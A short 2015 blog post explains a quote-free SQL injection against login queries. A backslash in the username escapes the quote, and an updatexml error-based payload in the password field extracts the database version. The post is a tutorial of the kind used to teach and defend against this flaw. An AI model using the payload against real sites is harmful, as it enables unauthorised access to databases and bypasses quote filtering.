[Without Quotes] String Based SQL Injection

Mukarram Khalid • October 15, 2015


Today, I'm going to discuss a special case of string based SQL injection where you can perform the injection without the use of quotes. You heard it right, absolutely no quotes at all in string based injections. This may come in handy if the quotes are blocked.

This may not work everywhere but I actually found this vulnerability on a sub-domain of a high profile target. I've created a demo with almost similar case scenario to show you guys how it actually works. You can watch this video for a detailed demo.

The idea is to use the quotes which are already present in the back end SQL query. We can escape the quotes which are not required and make them part of the input string.

For example, Lets say, the back end query looks like:

SELECT * from tbl_admin where username='$username' and password='$password' limit 0,1

In the username parameter, we can insert back slash \ to escape the closing quote thus making the opening quote of password as the closing quote of the username. Then, we can perform SQL injection in the password field like integer based SQL injection without using quotes.

SELECT * from tbl_admin where username='\' and password=' and updatexml(null, concat(0x3a, version() ) ,null) -- -' limit 0,1

Please watch the video for better understanding. If you have any further suggestions, drop me a PM. Contact details are in the footer.